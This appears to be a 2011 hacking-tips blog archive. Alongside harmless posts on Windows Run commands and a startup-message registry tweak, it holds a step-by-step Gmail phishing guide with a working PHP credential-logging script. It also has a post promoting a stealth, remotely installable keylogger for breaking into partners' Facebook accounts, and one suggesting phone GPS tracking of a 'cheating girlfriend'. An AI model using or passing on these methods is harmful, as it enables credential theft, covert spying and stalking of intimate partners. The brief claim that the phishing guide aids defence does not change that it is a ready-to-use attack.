April 30, 2011

Windows Run Commands


Accessibility Controls access.cpl

Accessibility Wizard accwiz

Add Hardware Wizard hdwwiz.cpl

Add/Remove Programs appwiz.cpl

Administrative Tools control admintools

Adobe Acrobat (if installed) acrobat

Adobe Designer (if installed) acrodist

Adobe Distiller (if installed) acrodist

Adobe ImageReady (if installed) imageready

Adobe Photoshop (if installed) photoshop

Automatic Updates wuaucpl.cpl

Bluetooth Transfer Wizard fsquirt

Calculator calc

Certificate Manager certmgr.msc

Character Map charmap

Check Disk Utility chkdsk

Clipboard Viewer clipbrd

Command Prompt cmd

Component Services dcomcnfg

Computer Management compmgmt.msc

Control Panel control

Date and Time Properties timedate.cpl

Device Manager devmgmt.msc

Disk Cleanup Utility cleanmgr

Disk Defragment dfrg.msc

Disk Management diskmgmt.msc

Disk Partition Manager diskpart

Display Properties control desktop

Display Properties desk.cpl

Display Properties (w/Appearance Tab Preselected) control color

Dr. Watson System Troubleshooting Utility drwtsn32

Driver Verifier Utility verifier

Event Viewer eventvwr.msc

Files and Settings Transfer Tool migwiz

File Signature Verification Tool sigverif

Findfast findfast.cpl

Firefox (if installed) firefox

Folders Properties control folders

Fonts control fonts

Fonts Folder fonts

Free Cell Card Game freecell

Game Controllers joy.cpl

Group Policy Editor (XP Proff) gpedit.msc

Hearts Card Game mshearts

Help and Support helpctr

HyperTerminal hypertrm

Iexpress Wizard iexpress

Indexing Service ciadv.msc

Internet Connection Wizard icwconn1

Internet Explorer iexplore

Internet Properties inetcpl.cpl

Internet Setup Wizard inetwiz

IP Configuration (Display Connection Configuration) ipconfig /all

IP Configuration (Display DNS Cache Contents) ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns

IP Configuration (Release All Connections) ipconfig /release

IP Configuration (Renew All Connections) ipconfig /renew

IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns

IP Configuration (Display DHCP Class ID) ipconfig /showclassid

IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid

Java Control Panel (If Installed) jpicpl32.cpl

Java Control Panel (If Installed) javaws

Keyboard Properties control keyboard

Local Security Settings secpol.msc

Local Users and Groups lusrmgr.msc

Logs You Out Of Windows logoff

Malicious Software Removal Tool mrt

Microsoft Access (if installed) access.cpl

Microsoft Chat winchat

Microsoft Excel (if installed) excel

Microsoft Frontpage (if installed) frontpg

Microsoft Movie Maker moviemk

Microsoft Paint mspaint

Microsoft Powerpoint (if installed) powerpnt

Microsoft Word (if installed) winword

Microsoft Syncronization Tool mobsync

Minesweeper Game winmine

Mouse Properties control mouse

Mouse Properties main.cpl

Nero (if installed) nero

Netmeeting conf

Network Connections control netconnections

Network Connections ncpa.cpl

Network Setup Wizard netsetup.cpl

Notepad notepad

Nview Desktop Manager (If Installed) nvtuicpl.cpl

On Screen Keyboard osk

Outlook Express msimn

Paint pbrush

Password Properties password.cpl

Performance Monitor perfmon.msc

Performance Monitor perfmon

Phone and Modem Options telephon.cpl

Phone Dialer dialer

Pinball Game pinball

Power Configuration powercfg.cpl

Printers and Faxes control printers

Private Character Editor eudcedit

Regional Settings intl.cpl

Registry Editor regedit

Registry Editor regedit32

Remote Access Phonebook rasphone

Remote Desktop mstsc

Removable Storage ntmsmgr.msc

Scanners and Cameras sticpl.cpl

Scheduled Tasks control schedtasks

Security Center wscui.cpl

Services services.msc

Shared Folders fsmgmt.msc

Shuts Down Windows shutdown

Sounds and Audio mmsys.cpl

Spider Solitare Card Game spider

SQL Client Configuration cliconfg

System Configuration Editor sysedit

System Configuration Utility msconfig

System Information msinfo32

System Properties sysdm.cpl

Task Manager taskmgr

TCP Tester tcptest

Telnet Client telnet
User Account Management nusrmgr.cpl

Utility Manager utilman

Windows Backup Utility (if installed) ntbackup

Windows Explorer explorer

Windows Firewall firewall.cpl

Windows Magnifier magnify

Windows Management Infrastructure wmimgmt.msc

Windows Media Player wmplayer

Windows Messenger msmsgs

Windows System Security Tool syskey

Windows Update Launches wupdmgr

Windows Version (to show which version of windows) winver

Hope these were helpful..
Thank you...

April 29, 2011

UNLOCK YOUR MOBILE TO BREAK SECURITY PASSWORD BY GENERATING MASTER CODE

UNLOCK

STEP 1: Dial the code simply key *#o6# to finfd your Imei no,this may also be found on the battery of your phone.

STEP 2: Call the no ,dial 09065910367 & type your IMEI code to obtain your unlock code.

STEP 3: Enter the instantly generated unlocking code & your mobile phone will be unlocked.


April 23, 2011

Hack Facebook Password – Facebook Hacking


Wondering to know how to hack Facebook password? Well, before you can do that, it is very much necessary to understand the real ways of hacking that actually work and also those that are simply scam and do not work. So in this post, we’ll look at some of the possible ways to hack Facebook password!
Every day I get a lot of emails from people requesting me to hack Facebook passwords of their spouse, girlfriend or boyfriend so as to reveal their secret relationships (if any). Most of them are even willing to pay for the service. However, I strongly deny any such requests since I do not provide any paid hacking service. But anyhow, I have decided to write down this post so that you can learn the tricks for yourself and implement everything at your own risk.

Possible Ways to Hack Facebook Password

1. Keylogging – The Easiest Way!

Keylogging refers to simply recording each and every keystroke that is typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will automatically load from the start-up, runs in the invisible mode and start capturing each and every keystroke that was typed on the computer.
Some keyloggers with advanced features can also capture screenshots and monitor every activity of the computer. One doesn’t need to have any special knowledge in order to install and use a keylogger. That means, anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to Facebook account.

SniperSpy (TESTED) is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail or Hotmail. There are absolutely *NO* limitations to what accounts or websites this software can access!
Why SniperSpy is the best?
Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However, there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this, you can install it on a remote computer without the need for having physical access to it. It operates in a complete stealth mode so that it remains undetected.

Here is a summary of benefits that you will receive with Sniperspy software:

1.Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.

2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.

3. Never Get Caught!
SniperSpy operates in a total stealth mode and thus remains undetectable. Therefore you need not have the fear of being traced or getting caught.

4. Remote Installation Feature
With the Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However, it can also be installed on a local computer.

5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.

6. Completely Safe to Use
This software is 100% safe to use since it does not collect any personal information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.

7. Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.

April 21, 2011

TRACE ANYONES MOBILE INSTANTLY WITH GPS & WITHOUT GPS FOR FREE


TRACE ANYONES MOBILE INSTANTLY WITH GPS & WITHOUT GPS FOR FREE

Yes Guys, this is now possible...I m not jokingMany of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.



This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (LOL) . This PhoneOnMap can be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents.



If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installingapplication on cell phone.



Features of GPS cell phone tracking system :-
1. GPS cell phone tracker and locater will not work in the underground transportation .



2. The application does not work when the phone is turned off.



3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .



4. Once application is uninstalled from cell phone than you can’t do anything .



5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .



Accordng to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delvery system like Courrier and Home delivery system. This will help them to get a realtime location of the object and provide an accurate timeframe for the delivery.



As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating girlfrend…(lol)

April 14, 2011

PHISHING: A MODERN TECHNIQUE OF EMAIL HACKING

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.
1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit + S which does this automatically. Choose where you would like to save the web page and it save.

3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
Header(“Location: https://www.google.com/accounts/ServiceLogin?
service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com
%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.
So far you should see the following in your folder:

5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit + F , or go to Edit -> Find , type in action and hit “Find Next”.

7. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.
8. Save and close the file.
9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.
10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.
11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:




As you can see if you fell for this the hacker would have your email and password. Scary, eh?

April 3, 2011

In WINDOWS 7 Display a Message at Start Up


At the time of Windows boot up a popup message can be added which contains any message you wish to display. In many organizations there a display of a message to display instructions or policies of Organization etc. in Windows, whenever you boot it.
Here is how you can do it too:
 Open Registry Editor (Go to Start Run type Regedit & press enter)
 Navigate to : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
 In the Right Side pane select & open LegalNoticeCaption and enter a value that you want to see in the Menu Bar.
 Next to it open LegalNoticeText and insert the message you want to display each time Windows boots.
 Close Registry & Restart for changes to take effect.